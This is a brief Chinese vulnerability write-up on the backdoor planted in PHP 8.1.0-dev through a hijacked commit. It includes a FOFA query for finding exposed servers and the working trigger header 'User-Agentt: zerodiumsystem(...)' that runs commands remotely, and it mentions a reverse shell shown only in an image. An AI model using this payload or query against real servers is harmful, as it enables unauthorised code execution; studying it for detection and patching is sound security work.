# PHP zerodium后门漏洞
## 漏洞描述
PHP开发工程师Jake Birchall在对其中一个恶意COMMIT的分析过程中发现,在代码中注入的后门是来自一个PHP代码被劫持的网站上,并且采用了远程代码执行的操作,并且攻击者盗用了PHP开发人员的名义来提交此COMMIT。
目前为止PHP官方并未就该事件进行更多披露,表示此次服务器被黑的具体细节仍在调查当中。由于此事件的影响,PHP的官方代码库已经被维护人员迁移至GitHub平台,之后的相关代码更新、修改将会都在GitHub上进行。
## 漏洞影响
> [!NOTE]
>
> PHP 8.1.0-dev
## FOFA
> [!NOTE]
>
> “PHP/8.1.0-dev”
## 漏洞复现
后门为添加请求头
“`
User-Agentt: zerodiumsystem(‘id’);
“`
> [!NOTE]
>
> 是 User-Agentt 不是 User-Agent
![](/static/qingy/PHP_zerodium后门漏洞/img/1.png)
反弹shell
![](/static/qingy/PHP_zerodium后门漏洞/img/2.png)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容